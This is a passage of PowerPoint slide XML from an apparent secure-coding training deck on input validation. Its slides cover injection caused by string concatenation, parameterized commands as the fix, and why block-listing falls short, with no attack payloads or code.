      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C8D7EC-7413-5D48-B94B-0FB0846FF7D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127310" y="1778696"/>
            <a:ext cx="4227534" cy="3003115"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4014591"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3576181"/>
              <a:gd name="connsiteX1" fmla="*/ 513567 w 4014591"/>
              <a:gd name="connsiteY1" fmla="*/ 212943 h 3576181"/>
              <a:gd name="connsiteX2" fmla="*/ 682668 w 4014591"/>
              <a:gd name="connsiteY2" fmla="*/ 1077239 h 3576181"/>
              <a:gd name="connsiteX3" fmla="*/ 1346547 w 4014591"/>
              <a:gd name="connsiteY3" fmla="*/ 1352811 h 3576181"/>
              <a:gd name="connsiteX4" fmla="*/ 1835063 w 4014591"/>
              <a:gd name="connsiteY4" fmla="*/ 2336105 h 3576181"/>
              <a:gd name="connsiteX5" fmla="*/ 2636728 w 4014591"/>
              <a:gd name="connsiteY5" fmla="*/ 2555310 h 3576181"/>
              <a:gd name="connsiteX6" fmla="*/ 4014591 w 4014591"/>
              <a:gd name="connsiteY6" fmla="*/ 3576181 h 357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4591" h="3576181">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="199894" y="16701"/>
                  <a:pt x="399789" y="33403"/>
                  <a:pt x="513567" y="212943"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="627345" y="392483"/>
                  <a:pt x="543838" y="887261"/>
                  <a:pt x="682668" y="1077239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="821498" y="1267217"/>
                  <a:pt x="1154481" y="1143000"/>
                  <a:pt x="1346547" y="1352811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1538613" y="1562622"/>
                  <a:pt x="1620033" y="2135688"/>
                  <a:pt x="1835063" y="2336105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2050093" y="2536522"/>
                  <a:pt x="2273473" y="2348631"/>
                  <a:pt x="2636728" y="2555310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2999983" y="2761989"/>
                  <a:pt x="3507287" y="3169085"/>
                  <a:pt x="4014591" y="3576181"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:headEnd w="med" len="lg"/>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491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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>Attacks Prevented by Input Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0480E4-499C-6348-93E8-1327EFC5EFEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4539530" y="1690688"/>
            <a:ext cx="7034722" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Path Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Open Redirect </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>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540494"/>
            <a:ext cx="3189889" cy="4931229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32127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073D-FEDD-9B4A-8597-5093A867C22D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="69000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>How About the Irish?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A32FDC-9C67-3946-ACD5-190BAEC3669B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3792298"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="69000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Names, comments, articles, free text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>require quotes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>O'Brien, don't, "putting things in quotes"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>While input validation reduces the attack surface, it cannot prevent all attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363813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559505"/>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Input Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reduces the attack surface and prevents many attack types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Block-listing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is a bad practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Many input types are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">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alphanumeric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For those input types that need special characters we need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>different defenses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189045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D5F721-1BB4-D440-9D48-CAE191350ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack-Grams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365F41C3-2B7A-A946-9BC3-1EB328FF7109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Common Software Attacks - A Visual Journey </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4093564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FA69-2AB4-7744-800C-714D891EC1C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338202" y="363255"/>
            <a:ext cx="10345840" cy="1327759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0">
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>CONCATENATION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" b="1" dirty="0">
              <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6C0B370-2B64-0242-B19C-0A54237459CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511265" y="4887357"/>
            <a:ext cx="10846546"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Bradley Hand" pitchFamily="2" charset="77"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>… causes Injection!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="8000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E507BF-8C02-1046-8EF2-1FB5D2FFAFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620110" y="2627917"/>
            <a:ext cx="1119569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COMMAND + </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5400" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5400" b="1" i="0" u="none"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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5400" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51AC20D-3679-3443-B9E1-C79D69AB588E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21125974">
            <a:off x="2811045" y="3295972"/>
            <a:ext cx="5194051" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow>
              <a:schemeClr val="accent4">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glo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i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Other Command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2459553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1AC20D-3679-3443-B9E1-C79D69AB588E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21370022">
            <a:off x="385046" y="1183183"/>
            <a:ext cx="905889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Parameterized Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB36DCC-8D27-D944-BDCB-328E12A45B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514231" y="367575"/>
            <a:ext cx="9030036"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sng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rPr>
              <a:t>CONCATENATION</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6600" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E1B735-5B12-EB41-9223-69A188D927C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2420043274"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838726" y="2666436"/>
          <a:ext cx="5775588" cy="2474208"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:effectLst/>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3149890">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1410839684"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2625698">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1305350556"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="824736">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>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u="sng" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>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824736">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Parameter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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>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824736">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Parameter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4400" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>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1" name="Curved Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253FE8D2-F568-C24B-B653-D229D68A7DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6791945" y="3903540"/>
            <a:ext cx="1364083" cy="100302"/>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EF557DF5-6613-AA45-931A-0A33923B6AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2945079212"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8538764" y="2666436"/>
          <a:ext cx="2814510" cy="2227198"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:effectLst/>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2814510">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1410839684"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2227198">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Command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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646A44C0-63B9-A646-9F95-AFE66A41BB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="672727" y="5291618"/>
            <a:ext cx="10846546"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strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>… prevent Injection!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6600" b="0" i="0" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="508206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INJECTION!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2989278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90CA3-52A4-7043-9B0A-4076CA7B5B2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="206151"/>
            <a:ext cx="12192000" cy="614253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19146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101B40-FCB6-6041-A453-DDFDD30117C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4549699"/>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579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97141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49D7D-9A5E-0F4A-99A0-0B3369B67C51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
